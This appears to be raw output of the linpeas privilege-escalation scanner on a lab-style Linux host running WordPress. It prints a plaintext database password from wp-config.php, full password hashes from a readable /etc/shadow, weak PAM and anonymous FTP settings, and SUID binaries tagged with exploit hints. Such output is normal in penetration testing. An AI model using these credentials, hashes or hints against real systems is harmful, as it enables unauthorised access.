/usr/share/wordpress/wp-config.php +$debian_server = preg_replace('/:.*/', "", $_SERVER['HTTP_HOST']); +if (!defined('DB_NAME')) + define('DB_NAME', 'wordpress'); +if (!defined('DB_USER')) + define('DB_USER', 'wordpress'); +if (!defined('DB_HOST')) + define('DB_HOST', 'localhost'); +-rw-r--r-- 1 www-data www-data 3032 May 6 11:17 /var/www/yggdrasil/wp-config.php +define( 'DB_NAME', 'wordpress' ); +define( 'DB_USER', 'wordpress' ); +define( 'DB_PASSWORD', 'JXakuf5DzA3q7nnj' ); +define( 'DB_HOST', 'localhost' ); +$currenthost = "http://".$_SERVER['HTTP_HOST']; +$currentpath = preg_replace('@/+$@','',dirname($_SERVER['SCRIPT_NAME'])); + +╔══════════╣ Analyzing Rsync Files (limit 70) +-rw-r--r-- 1 root root 1044 May 6 11:17 /usr/share/doc/rsync/examples/rsyncd.conf +[ftp] + comment = public archive + path = /var/www/pub + use chroot = yes + lock file = /var/lock/rsyncd + read only = yes + list = yes + uid = nobody + gid = nogroup + strict modes = yes + ignore errors = no + ignore nonreadable = yes + transfer logging = no + timeout = 600 + refuse options = checksum dry-run + dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz + + +╔══════════╣ Analyzing PAM Auth Files (limit 70) +drwxr-xr-x 2 root root 4096 May 6 11:17 /etc/pam.d +ICMP is not accessible +-rw-r--r-- 1 root root 2133 May 6 11:17 /etc/pam.d/sshd +account required pam_nologin.so +session [success=ok ignore=ignore module_unknown=ignore default=bad] pam_selinux.so close +session required pam_loginuid.so +session optional pam_keyinit.so force revoke +session optional pam_motd.so motd=/run/motd.dynamic +session optional pam_motd.so noupdate +session optional pam_mail.so standard noenv # [1] +session required pam_limits.so +session required pam_env.so # [1] +session required pam_env.so user_readenv=1 envfile=/etc/default/locale +session [success=ok ignore=ignore module_unknown=ignore default=bad] pam_selinux.so open + +drwxr-xr-x 2 root root 4096 May 6 11:17 /etc/pam.d +-rw-r--r-- 1 root root 143 May 6 11:17 /etc/pam.d/runuser +auth sufficient pam_rootok.so +-rw-r--r-- 1 root root 317 May 6 11:17 /etc/pam.d/systemd-user +-rw-r--r-- 1 root root 95 May 6 11:17 /etc/pam.d/sudo +-rw-r--r-- 1 root root 2133 May 6 11:17 /etc/pam.d/sshd +-rw-r--r-- 1 root root 1440 May 6 11:17 /etc/pam.d/common-password +password required pam_permit.so +-rw-r--r-- 1 root root 92 May 6 11:17 /etc/pam.d/newusers +-rw-r--r-- 1 root root 2257 May 6 11:17 /etc/pam.d/su +auth sufficient pam_rootok.so +-rw-r--r-- 1 root root 454 May 6 11:17 /etc/pam.d/smtp +-rw-r--r-- 1 root root 92 May 6 11:17 /etc/pam.d/passwd +-rw-r--r-- 1 root root 606 May 6 11:17 /etc/pam.d/cron +-rw-r--r-- 1 root root 1189 May 6 11:17 /etc/pam.d/common-session +session [default=1] pam_permit.so +session required pam_permit.so +-rw-r--r-- 1 root root 138 May 6 11:17 /etc/pam.d/runuser-l +-rw-r--r-- 1 root root 4945 May 6 11:17 /etc/pam.d/login +-rw-r--r-- 1 root root 319 May 6 11:17 /etc/pam.d/vsftpd +-rw-r--r-- 1 root root 384 May 6 11:17 /etc/pam.d/chfn +auth sufficient pam_rootok.so +-rw-r--r-- 1 root root 1154 May 6 11:17 /etc/pam.d/common-session-noninteractive +session [default=1] pam_permit.so +session required pam_permit.so +-rw-r--r-- 1 root root 1208 May 6 11:17 /etc/pam.d/common-account +account required pam_permit.so +-rw-r--r-- 1 root root 581 May 6 11:17 /etc/pam.d/chsh +auth sufficient pam_rootok.so +-rw-r--r-- 1 root root 1221 May 6 11:17 /etc/pam.d/common-auth +auth [success=1 default=ignore] pam_unix.so nullok_secure +auth required pam_permit.so +-rw-r--r-- 1 root root 92 May 6 11:17 /etc/pam.d/chpasswd +-rw-r--r-- 1 root root 119 May 6 11:17 /etc/pam.d/vmtoolsd +-rw-r--r-- 1 root root 520 May 6 11:17 /etc/pam.d/other + + +╔══════════╣ Analyzing Ldap Files (limit 70) +The password hash is from the {SSHA} to 'structural' +drwxr-xr-x 2 root root 4096 May 6 11:17 /etc/ldap + +drwxr-xr-x 2 root root 4096 May 6 11:17 /usr/share/sendmail/examples/ldap + + +╔══════════╣ Analyzing Keyring Files (limit 70) +drwxr-xr-x 2 root root 4096 May 6 11:17 /usr/share/keyrings + + + + +╔══════════╣ Analyzing Postfix Files (limit 70) +-rw-r--r-- 1 root root 0 May 6 11:17 /etc/aliases +lrwxrwxrwx 1 root smmsp 10 May 6 11:13 /etc/mail/aliases -> ../aliases +-rw-r--r-- 1 root root 2176 May 6 11:17 /usr/share/X11/xkb/keycodes/aliases +-rw-r--r-- 1 root root 9758 May 6 11:17 /usr/share/mime/aliases +-rw-r--r-- 1 root root 233 May 6 11:17 /usr/share/sendmail/examples/db/aliases + +-rw-r--r-- 1 root root 694 May 6 11:17 /usr/share/bash-completion/completions/postfix + + +╔══════════╣ Analyzing Proxy Config Files (limit 70) +-rw-r--r-- 1 root root 0 May 6 11:17 /etc/environment + + + +╔══════════╣ Analyzing FTP Files (limit 70) +-rw-r--r-- 1 root root 5903 May 6 11:17 /etc/vsftpd.conf +anonymous_enable=YES +local_enable +#write_enable=YES +#anon_upload_enable=YES +#anon_mkdir_write_enable=YES +#chown_uploads=YES +#chown_username=whoever +anon_root=/home/baldur/Uploads +-rw-r--r-- 1 root root 41 May 6 11:17 /usr/lib/tmpfiles.d/vsftpd.conf +-rw-r--r-- 1 root root 506 May 6 11:17 /usr/share/doc/vsftpd/examples/INTERNET_SITE/vsftpd.conf +anonymous_enable +local_enable +write_enable +anon_upload_enable +anon_mkdir_write_enable +anon_other_write_enable +-rw-r--r-- 1 root root 564 May 6 11:17 /usr/share/doc/vsftpd/examples/INTERNET_SITE_NOINETD/vsftpd.conf +anonymous_enable +local_enable +write_enable +anon_upload_enable +anon_mkdir_write_enable +anon_other_write_enable +-rw-r--r-- 1 root root 260 May 6 11:17 /usr/share/doc/vsftpd/examples/VIRTUAL_USERS/vsftpd.conf +anonymous_enable +local_enable=YES +write_enable +anon_upload_enable +anon_mkdir_write_enable +anon_other_write_enable + + + +-rw-r--r-- 1 root root 69 May 6 11:17 /etc/php/7.0/mods-available/ftp.ini +-rw-r--r-- 1 root root 69 May 6 11:17 /usr/share/php7.0-common/common/ftp.ini + + + + + + +╔══════════╣ Analyzing Other Interesting Files (limit 70) +-rw-r--r-- 1 root root 3526 May 6 11:17 /etc/skel/.bashrc +-rw-r--r-- 1 user user 3526 May 6 11:17 /home/user/.bashrc + + + + + +-rw-r--r-- 1 root root 675 May 6 11:17 /etc/skel/.profile +-rw-r--r-- 1 user user 675 May 6 11:17 /home/user/.profile + + + + +╔══════════╣ Analyzing Windows Files (limit 70) + + + + + + + + + + + + + + + + + + + + + + +lrwxrwxrwx 1 root root 22 May 6 11:12 /etc/alternatives/my.cnf -> /etc/mysql/mariadb.cnf +lrwxrwxrwx 1 root root 24 May 6 11:12 /etc/mysql/my.cnf -> /etc/alternatives/my.cnf +-rw-r--r-- 1 root root 83 May 6 11:17 /var/lib/dpkg/alternatives/my.cnf + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +╔══════════╣ Searching mysql credentials and exec (T1552.001) +From '/etc/mysql/mariadb.conf.d/50-server.cnf' Mysql user: user = mysql +Found readable /etc/mysql/my.cnf +[client-server] +!includedir /etc/mysql/conf.d/ +!includedir /etc/mysql/mariadb.conf.d/ + +╔══════════╣ MySQL version (T1552.001) +mysql Ver 15.1 Distrib 10.1.45-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2 + + +═╣ MySQL connection using default root/root ........... No +═╣ MySQL connection using root/toor ................... No +═╣ MySQL connection using root/NOPASS ................. No + +MySQL is running as user 'mysql' with version 10.1.45. +╔══════════╣ Analyzing PGP-GPG Files (limit 70) +/usr/bin/gpg +gpg Not Found +netpgpkeys Not Found +netpgp Not Found + +-rw-r--r-- 1 root root 8748 May 6 11:17 /etc/apt/trusted.gpg.d/debian-archive-bullseye-automatic.gpg +-rw-r--r-- 1 root root 8757 May 6 11:17 /etc/apt/trusted.gpg.d/debian-archive-bullseye-security-automatic.gpg +-rw-r--r-- 1 root root 2469 May 6 11:17 /etc/apt/trusted.gpg.d/debian-archive-bullseye-stable.gpg +-rw-r--r-- 1 root root 8176 May 6 11:17 /etc/apt/trusted.gpg.d/debian-archive-buster-automatic.gpg +-rw-r--r-- 1 root root 8185 May 6 11:17 /etc/apt/trusted.gpg.d/debian-archive-buster-security-automatic.gpg +-rw-r--r-- 1 root root 2344 May 6 11:17 /etc/apt/trusted.gpg.d/debian-archive-buster-stable.gpg +-rw-r--r-- 1 root root 5138 May 6 11:17 /etc/apt/trusted.gpg.d/debian-archive-jessie-automatic.gpg +-rw-r--r-- 1 root root 5147 May 6 11:17 /etc/apt/trusted.gpg.d/debian-archive-jessie-security-automatic.gpg +-rw-r--r-- 1 root root 2775 May 6 11:17 /etc/apt/trusted.gpg.d/debian-archive-jessie-stable.gpg +-rw-r--r-- 1 root root 7483 May 6 11:17 /etc/apt/trusted.gpg.d/debian-archive-stretch-automatic.gpg +-rw-r--r-- 1 root root 7492 May 6 11:17 /etc/apt/trusted.gpg.d/debian-archive-stretch-security-automatic.gpg +-rw-r--r-- 1 root root 2275 May 6 11:17 /etc/apt/trusted.gpg.d/debian-archive-stretch-stable.gpg + + + + + + + + + +╔══════════╣ Checking for PackageKit Pack2TheRoot (CVE-2026-41651) (T1068) +╚ https://github.security.telekom.com/2026/04/pack2theroot-linux-local-privilege-escalation.html +PackageKit Not Found + + +╔══════════╣ Searching uncommon passwd files (splunk) (T1552.001) +passwd file: /etc/pam.d/passwd +passwd file: /etc/passwd +passwd file: /usr/share/bash-completion/completions/passwd +passwd file: /usr/share/lintian/overrides/passwd + +╔══════════╣ Searching ssl/ssh files (T1552.004,T1021.004) +╔══════════╣ Analyzing SSH Files (limit 70) + + + + + +-rw-r--r-- 1 root root 604 May 6 11:17 /etc/ssh/mgmt_ssh_host_dsa_key.pub +-rw-r--r-- 1 root root 176 May 6 11:17 /etc/ssh/mgmt_ssh_host_ecdsa_key.pub +-rw-r--r-- 1 root root 96 May 6 11:17 /etc/ssh/mgmt_ssh_host_ed25519_key.pub +-rw-r--r-- 1 root root 396 May 6 11:17 /etc/ssh/mgmt_ssh_host_rsa_key.pub +-rw-r--r-- 1 root root 604 May 6 11:17 /etc/ssh/ssh_host_dsa_key.pub +-rw-r--r-- 1 root root 176 May 6 11:17 /etc/ssh/ssh_host_ecdsa_key.pub +-rw-r--r-- 1 root root 96 May 6 11:17 /etc/ssh/ssh_host_ed25519_key.pub +-rw-r--r-- 1 root root 396 May 6 11:17 /etc/ssh/ssh_host_rsa_key.pub + +ChallengeResponseAuthentication no +UsePAM yes +══╣ Some certificates were found (out limited): (T1552.004,T1021.004) +/etc/mail/tls/sendmail-client.crt +/etc/mail/tls/sendmail-server.crt +/etc/ssl/certs/ACCVRAIZ1.pem +/etc/ssl/certs/AC_RAIZ_FNMT-RCM.pem +/etc/ssl/certs/Actalis_Authentication_Root_CA.pem +/etc/ssl/certs/AffirmTrust_Commercial.pem +/etc/ssl/certs/AffirmTrust_Networking.pem +/etc/ssl/certs/AffirmTrust_Premium.pem +/etc/ssl/certs/AffirmTrust_Premium_ECC.pem +/etc/ssl/certs/Amazon_Root_CA_1.pem +/etc/ssl/certs/Amazon_Root_CA_2.pem +/etc/ssl/certs/Amazon_Root_CA_3.pem +/etc/ssl/certs/Amazon_Root_CA_4.pem +/etc/ssl/certs/Atos_TrustedRoot_2011.pem +/etc/ssl/certs/Autoridad_de_Certificacion_Firmaprofesional_CIF_A62634068.pem +/etc/ssl/certs/Baltimore_CyberTrust_Root.pem +/etc/ssl/certs/Buypass_Class_2_Root_CA.pem +/etc/ssl/certs/Buypass_Class_3_Root_CA.pem +/etc/ssl/certs/CA_Disig_Root_R2.pem +/etc/ssl/certs/CFCA_EV_ROOT.pem +/etc/mail/tls/sendmail-client.csr +/etc/mail/tls/sendmail-server.csr + +══╣ Some SSH Agent files were found: (T1552.004,T1021.004) +/run/systemd/generator.late/graphical.target.wants/qemu-guest-agent.service +/run/systemd/generator.late/multi-user.target.wants/qemu-guest-agent.service +/run/systemd/generator.late/qemu-guest-agent.service + +══╣ Some home ssh config file was found (T1552.004,T1021.004) +/usr/share/openssh/sshd_config +ChallengeResponseAuthentication no +UsePAM yes +X11Forwarding yes +PrintMotd no +AcceptEnv LANG LC_* +Subsystem sftp /usr/lib/openssh/sftp-server + +══╣ /etc/hosts.allow file found, trying to read the rules: (T1552.004,T1021.004) +/etc/hosts.allow + + +Searching inside /etc/ssh/ssh_config for interesting info +Host * + SendEnv LANG LC_* + HashKnownHosts yes + GSSAPIAuthentication yes + + + + + ╔════════════════════════════════════╗ +══════════════════════╣ Files with Interesting Permissions ╠══════════════════════ + ╚════════════════════════════════════╝ +╔══════════╣ SUID - Check easy privesc, exploits and write perms (T1548.001) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid +strings Not Found +strace Not Found +-rwsr-xr-x 1 root root 60K May 6 11:17 /bin/ping +-rwsr-xr-x 1 root root 40K May 6 11:17 /bin/su +-rwsr-xr-x 1 root root 44K May 6 11:17 /bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8 +-rwsr-xr-x 1 root root 31K May 6 11:17 /bin/umount ---> BSD/Linux(08-1996) +-rwsr-xr-x 1 root root 31K May 6 11:17 /bin/fusermount +-rwsr-xr-x 1 root root 10K May 6 11:17 /usr/sbin/sensible-mda (Unknown SUID binary!) +-rwsr-sr-x 1 root mail 92K May 6 11:17 /usr/bin/procmail +-rwsr-xr-x 1 root root 138K May 6 11:17 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable +-rwsr-xr-x 1 root root 59K May 6 11:17 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997) +-rwsr-xr-x 1 root root 75K May 6 11:17 /usr/bin/gpasswd +-rwsr-xr-x 1 root root 49K May 6 11:17 /usr/bin/chfn ---> SuSE_9.3/10 +-rwsr-xr-x 1 root root 40K May 6 11:17 /usr/bin/chsh +-rwsr-xr-x 1 root root 40K May 6 11:17 /usr/bin/newgrp ---> HP-UX_10.20 +-rwsr-xr-- 1 root messagebus 42K May 6 11:17 /usr/lib/dbus-1.0/dbus-daemon-launch-helper +-rwsr-xr-x 1 root root 10K May 6 11:17 /usr/lib/eject/dmcrypt-get-device +-rwsr-xr-x 1 root root 431K May 6 11:17 /usr/lib/openssh/ssh-keysign + +╔══════════╣ SGID (T1548.001) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid +-rwxr-sr-x 1 root shadow 35K May 6 11:17 /sbin/unix_chkpwd +-rwxr-sr-x 1 root shadow 23K May 6 11:17 /usr/bin/expiry +-rwxr-sr-x 1 root ssh 351K May 6 11:17 /usr/bin/ssh-agent +-rwxr-sr-x 3 root mail 15K May 6 11:17 /usr/bin/mail-unlock +-rwsr-sr-x 1 root mail 92K May 6 11:17 /usr/bin/procmail +-rwxr-sr-x 1 root mail 19K May 6 11:17 /usr/bin/lockfile +-rwxr-sr-x 1 root tty 27K May 6 11:17 /usr/bin/wall +-rwxr-sr-x 1 root crontab 40K May 6 11:17 /usr/bin/crontab +-rwxr-sr-x 3 root mail 15K May 6 11:17 /usr/bin/mail-touchlock +-rwxr-sr-x 1 root mail 19K May 6 11:17 /usr/bin/dotlockfile +-rwxr-sr-x 3 root mail 15K May 6 11:17 /usr/bin/mail-lock +-rwxr-sr-x 1 root shadow 71K May 6 11:17 /usr/bin/chage +-rwxr-sr-x 1 root tty 15K May 6 11:17 /usr/bin/bsd-write +-rwxr-sr-x 1 root smmsp 833K May 6 11:17 /usr/lib/sm.bin/sendmail ---> Sendmail_8.10.1/Sendmail_8.11.x/Linux_Kernel_2.2.x_2.4.0-test1_(SGI_ProPack_1.2/1.3) +-rwxr-sr-x 1 root smmsp 77K May 6 11:17 /usr/lib/sm.bin/mailstats (Unknown SGID binary) + +╔══════════╣ Files with ACLs (limited to 50) (T1222) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#acls +files with acls in searched folders Not Found + +╔══════════╣ Capabilities (T1548.001) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#capabilities +══╣ Current shell capabilities (T1548.001) +CapInh: 0000000000000000 +CapPrm: 0000000000000000 +CapEff: 0000000000000000 +CapBnd: 0000003fffffffff +CapAmb: 0000000000000000 + +══╣ Parent proc capabilities (T1548.001) +CapInh: 0000000000000000 +CapPrm: 0000000000000000 +CapEff: 0000000000000000 +CapBnd: 0000003fffffffff +CapAmb: 0000000000000000 + + +Files with capabilities (limited to 50): + +╔══════════╣ Checking misconfigurations of ld.so (T1574.006) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#ldso +/etc/ld.so.conf +Content of /etc/ld.so.conf: +include /etc/ld.so.conf.d/*.conf + +/etc/ld.so.conf.d + /etc/ld.so.conf.d/libc.conf + - /usr/local/lib + /etc/ld.so.conf.d/x86_64-linux-gnu.conf + - /lib/x86_64-linux-gnu + - /usr/lib/x86_64-linux-gnu + +/etc/ld.so.preload +╔══════════╣ Files (scripts) in /etc/profile.d/ (T1546.004) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#profiles-files +total 12 +drwxr-xr-x 2 root root 4096 May 6 11:17 . +drwxr-xr-x 85 root root 4096 May 6 11:17 .. +-rw-r--r-- 1 root root 663 May 6 11:17 bash_completion.sh + +╔══════════╣ Permissions in init, init.d, systemd, and rc.d (T1543.002) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#init-initd-systemd-and-rcd + +╔══════════╣ AppArmor binary profiles (T1518.001) +-rw-r--r-- 1 root root 730 May 6 11:17 usr.sbin.mysqld + +═╣ Hashes inside passwd file? ........... No +═╣ Writable passwd file? ................ No +═╣ Credentials in fstab/mtab? ........... No +═╣ Can I read shadow files? ............. root:$6$mbIzpNIo$XElePqDmVNcUEhdU0nH1eQYvRvU1xQqQOM3F38Zceslqiz0tYTc1iAMxFXTt9TKlXsslPvLoLuMlE/n83iNce/:20579:0:99999:7::: +daemon:*:17569:0:99999:7::: +bin:*:17569:0:99999:7::: +sys:*:17569:0:99999:7::: +sync:*:17569:0:99999:7::: +games:*:17569:0:99999:7::: +man:*:17569:0:99999:7::: +lp:*:17569:0:99999:7::: +mail:*:17569:0:99999:7::: +news:*:17569:0:99999:7::: +uucp:*:17569:0:99999:7::: +proxy:*:17569:0:99999:7::: +www-data:*:17569:0:99999:7::: +backup:*:17569:0:99999:7::: +list:*:17569:0:99999:7::: +irc:*:17569:0:99999:7::: +gnats:*:17569:0:99999:7::: +nobody:*:17569:0:99999:7::: +systemd-timesync:*:17569:0:99999:7::: +systemd-network:*:17569:0:99999:7::: +systemd-resolve:*:17569:0:99999:7::: +systemd-bus-proxy:*:17569:0:99999:7::: +_apt:*:17569:0:99999:7::: +messagebus:*:17569:0:99999:7::: +sshd:*:17569:0:99999:7::: +user:$6$RGsJnnEH$mma2lPBOwYMp.3JZ/8dhUW4LZ6Mxee2d52wUiQyxMNOXjzUY5PG.SvfmkriTdHgn5WX7OsBo2AOiPCEEMtTN1.:17569:0:99999:7::: +mysql:!:20579:0:99999:7::: +ftp:*:20579:0:99999:7::: +smmta:*:20579:0:99999:7::: +smmsp:*:20579:0:99999:7::: +baldur:$6$/ScR4vLK$8XCAkPccvTAycL8fOxZagyk.vy54EqmdTcZQWQI.gzcygN6C5Iy35bMI65TZliwP6acrGpnhRBZKFrexoNGtu/:20579:0:99999:7::: +═╣ Can I read shadow plists? ............ No +═╣ Can I write shadow plists? ........... No +═╣ Can I read opasswd file? ............. No +═╣ Can I write in network-scripts? ...... No +═╣ Can I read root folder? .............. No + +╔══════════╣ Searching root files in home dirs (limit 30) (T1083) +/home/ +/home/baldur +/home/baldur/Uploads +/home/baldur/Uploads/todo.txt +/root/ +/var/www +/var/www/html +/var/www/html/index.html + +╔══════════╣ Searching folders owned by me containing others files on it (limit 100) (T1083) + +╔══════════╣ Readable files belonging to root and readable by me but not world readable (T1083) + +╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 200) (T1574.009,T1574.010) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-files +/run/lock +/run/lock/apache2 +/run/sendmail/mta/smsocket +/tmp +/tmp/cf31-probe-2649.py +/tmp/linpeas.sh +/tmp/out.txt +/var/cache/apache2/mod_cache_disk +/var/lib/php/sessions +/var/lib/wordpress/wp-content +/var/lib/wordpress/wp-content/index.php +/var/lib/wordpress/wp-content/languages +/var/lib/wordpress/wp-content/plugins +/var/lib/wordpress/wp-content/themes +/var/lib/wordpress/wp-content/uploads +/var/mail +/var/tmp +/var/www/yggdrasil +/var/www/yggdrasil/index.php +/var/www/yggdrasil/license.txt +/var/www/yggdrasil/readme.html +/var/www/yggdrasil/wp-activate.php +/var/www/yggdrasil/wp-admin +/var/www/yggdrasil/wp-admin/about.php +/var/www/yggdrasil/wp-admin/admin-ajax.php +/var/www/yggdrasil/wp-admin/admin-footer.php +/var/www/yggdrasil/wp-admin/admin-functions.php +/var/www/yggdrasil/wp-admin/admin-header.php +#)You_can_write_even_more_files_inside_last_directory + +/var/www/yggdrasil/wp-admin/css/about-rtl.css +/var/www/yggdrasil/wp-admin/css/about-rtl.min.css +/var/www/yggdrasil/wp-admin/css/about.css +/var/www/yggdrasil/wp-admin/css/about.min.css +/var/www/yggdrasil/wp-admin/css/admin-menu-rtl.css +#)You_can_write_even_more_files_inside_last_directory + +/var/www/yggdrasil/wp-admin/css/colors/_admin.scss +/var/www/yggdrasil/wp-admin/css/colors/_mixins.scss +/var/www/yggdrasil/wp-admin/css/colors/_variables.scss +/var/www/yggdrasil/wp-admin/css/colors/blue +/var/www/yggdrasil/wp-admin/css/colors/blue/colors-rtl.css +/var/www/yggdrasil/wp-admin/css/colors/blue/colors-rtl.min.css +/var/www/yggdrasil/wp-admin/css/colors/blue/colors.css +/var/www/yggdrasil/wp-admin/css/colors/blue/colors.min.css +/var/www/yggdrasil/wp-admin/css/colors/blue/colors.scss +/var/www/yggdrasil/wp-admin/css/colors/coffee +/var/www/yggdrasil/wp-admin/css/colors/coffee/colors-rtl.css +/var/www/yggdrasil/wp-admin/css/colors/coffee/colors-rtl.min.css +/var/www/yggdrasil/wp-admin/css/colors/coffee/colors.css +/var/www/yggdrasil/wp-admin/css/colors/coffee/colors.min.css +/var/www/yggdrasil/wp-admin/css/colors/coffee/colors.scss +/var/www/yggdrasil/wp-admin/css/colors/ectoplasm +/var/www/yggdrasil/wp-admin/css/colors/ectoplasm/colors-rtl.css +/var/www/yggdrasil/wp-admin/css/colors/ectoplasm/colors-rtl.min.css +/var/www/yggdrasil/wp-admin/css/colors/ectoplasm/colors.css +/var/www/yggdrasil/wp-admin/css/colors/ectoplasm/colors.min.css +/var/www/yggdrasil/wp-admin/css/colors/ectoplasm/colors.scss +/var/www/yggdrasil/wp-admin/css/colors/light +/var/www/yggdrasil/wp-admin/css/colors/light/colors-rtl.css +/var/www/yggdrasil/wp-admin/css/colors/light/colors-rtl.min.css +/var/www/yggdrasil/wp-admin/css/colors/light/colors.css +/var/www/yggdrasil/wp-admin/css/colors/light/colors.min.css +/var/www/yggdrasil/wp-admin/css/colors/light/colors.scss +/var/www/yggdrasil/wp-admin/css/colors/midnight +/var/www/yggdrasil/wp-admin/css/colors/midnight/colors-rtl.css +/var/www/yggdrasil/wp-admin/css/colors/midnight/colors-rtl.min.css +/var/www/yggdrasil/wp-admin/css/colors/midnight/colors.css +/var/www/yggdrasil/wp-admin/css/colors/midnight/colors.min.css +/var/www/yggdrasil/wp-admin/css/colors/midnight/colors.scss +/var/www/yggdrasil/wp-admin/css/colors/ocean +/var/www/yggdrasil/wp-admin/css/colors/ocean/colors-rtl.css +/var/www/yggdrasil/wp-admin/css/colors/ocean/colors-rtl.min.css +/var/www/yggdrasil/wp-admin/css/colors/ocean/colors.css +/var/www/yggdrasil/wp-admin/css/colors/ocean/colors.min.css +/var/www/yggdrasil/wp-admin/css/colors/ocean/colors.scss +/var/www/yggdrasil/wp-admin/css/colors/sunrise +/var/www/yggdrasil/wp-admin/css/colors/sunrise/colors-rtl.css +/var/www/yggdrasil/wp-admin/css/colors/sunrise/colors-rtl.min.css +/var/www/yggdrasil/wp-admin/css/colors/sunrise/colors.css +/var/www/yggdrasil/wp-admin/css/colors/sunrise/colors.min.css +/var/www/yggdrasil/wp-admin/css/colors/sunrise/colors.scss +/var/www/yggdrasil/wp-admin/css/common-rtl.css +/var/www/yggdrasil/wp-admin/css/common-rtl.min.css +/var/www/yggdrasil/wp-admin/css/common.css +/var/www/yggdrasil/wp-admin/css/common.min.css +/var/www/yggdrasil/wp-admin/css/customize-controls-rtl.css +#)You_can_write_even_more_files_inside_last_directory + +/var/www/yggdrasil/wp-admin/custom-background.php +/var/www/yggdrasil/wp-admin/custom-header.php +/var/www/yggdrasil/wp-admin/customize.php +/var/www/yggdrasil/wp-admin/edit-comments.php +/var/www/yggdrasil/wp-admin/edit-form-advanced.php +#)You_can_write_even_more_files_inside_last_directory + +/var/www/yggdrasil/wp-admin/includes/admin-filters.php +/var/www/yggdrasil/wp-admin/includes/admin.php +/var/www/yggdrasil/wp-admin/includes/ajax-actions.php +/var/www/yggdrasil/wp-admin/includes/bookmark.php +/var/www/yggdrasil/wp-admin/includes/class-automatic-upgrader-skin.php +#)You_can_write_even_more_files_inside_last_directory + +/var/www/yggdrasil/wp-admin/index.php +/var/www/yggdrasil/wp-admin/install-helper.php +/var/www/yggdrasil/wp-admin/install.php +/var/www/yggdrasil/wp-admin/js +/var/www/yggdrasil/wp-admin/js/accordion.js +/var/www/yggdrasil/wp-admin/js/accordion.min.js +/var/www/yggdrasil/wp-admin/js/code-editor.js +/var/www/yggdrasil/wp-admin/js/code-editor.min.js +/var/www/yggdrasil/wp-admin/js/color-picker.js +#)You_can_write_even_more_files_inside_last_directory + +/var/www/yggdrasil/wp-admin/js/widgets/custom-html-widgets.js +/var/www/yggdrasil/wp-admin/js/widgets/custom-html-widgets.min.js +/var/www/yggdrasil/wp-admin/js/widgets/media-audio-widget.js +/var/www/yggdrasil/wp-admin/js/widgets/media-audio-widget.min.js +/var/www/yggdrasil/wp-admin/js/widgets/media-gallery-widget.js +#)You_can_write_even_more_files_inside_last_directory + +/var/www/yggdrasil/wp-admin/js/word-count.js +/var/www/yggdrasil/wp-admin/js/word-count.min.js +/var/www/yggdrasil/wp-admin/js/wp-fullscreen-stub.js +/var/www/yggdrasil/wp-admin/js/wp-fullscreen-stub.min.js +/var/www/yggdrasil/wp-admin/js/xfn.js +#)You_can_write_even_more_files_inside_last_directory + +/var/www/yggdrasil/wp-admin/link-add.php +/var/www/yggdrasil/wp-admin/link-manager.php +/var/www/yggdrasil/wp-admin/link-parse-opml.php +/var/www/yggdrasil/wp-admin/link.php +/var/www/yggdrasil/wp-admin/load-scripts.php +#)You_can_write_even_more_files_inside_last_directory + +/var/www/yggdrasil/wp-admin/maint/repair.php +/var/www/yggdrasil/wp-admin/media-new.php +/var/www/yggdrasil/wp-admin/media-upload.php +/var/www/yggdrasil/wp-admin/media.php +/var/www/yggdrasil/wp-admin/menu-header.php +/var/www/yggdrasil/wp-admin/menu.php +#)You_can_write_even_more_files_inside_last_directory + +/var/www/yggdrasil/wp-admin/network/about.php +/var/www/yggdrasil/wp-admin/network/admin.php +/var/www/yggdrasil/wp-admin/network/credits.php +/var/www/yggdrasil/wp-admin/network/edit.php +/var/www/yggdrasil/wp-admin/network/freedoms.php +#)You_can_write_even_more_files_inside_last_directory + +/var/www/yggdrasil/wp-admin/options-discussion.php +/var/www/yggdrasil/wp-admin/options-general.php +/var/www/yggdrasil/wp-admin/options-head.php +/var/www/yggdrasil/wp-admin/options-media.php +/var/www/yggdrasil/wp-admin/options-permalink.php +#)You_can_write_even_more_files_inside_last_directory + +/var/www/yggdrasil/wp-admin/user/about.php +/var/www/yggdrasil/wp-admin/user/admin.php +/var/www/yggdrasil/wp-admin/user/credits.php +/var/www/yggdrasil/wp-admin/user/freedoms.php +/var/www/yggdrasil/wp-admin/user/index.php +#)You_can_write_even_more_files_inside_last_directory + +/var/www/yggdrasil/wp-admin/users.php +/var/www/yggdrasil/wp-admin/widgets.php +/var/www/yggdrasil/wp-blog-header.php +/var/www/yggdrasil/wp-comments-post.php +/var/www/yggdrasil/wp-config-sample.php +/var/www/yggdrasil/wp-config.php +/var/www/yggdrasil/wp-content +/var/www/yggdrasil/wp-content/index.php +/var/www/yggdrasil/wp-content/plugins +/var/www/yggdrasil/wp-content/plugins/akismet +/var/www/yggdrasil/wp-content/plugins/akismet/.htaccess +/var/www/yggdrasil/wp-content/plugins/akismet/LICENSE.txt +/var/www/yggdrasil/wp-content/plugins/akismet/_inc +/var/www/yggdrasil/wp-content/plugins/akismet/_inc/akismet.css +/var/www/yggdrasil/wp-content/plugins/akismet/_inc/akismet.js +/var/www/yggdrasil/wp-content/plugins/akismet/_inc/form.js +/var/www/yggdrasil/wp-content/plugins/akismet/_inc/img +/var/www/yggdrasil/wp-content/plugins/akismet/akismet.php +/var/www/yggdrasil/wp-content/plugins/akismet/class.akismet-admin.php +/var/www/yggdrasil/wp-content/plugins/akismet/class.akismet-cli.php +/var/www/yggdrasil/wp-content/plugins/akismet/class.akismet-rest-api.php 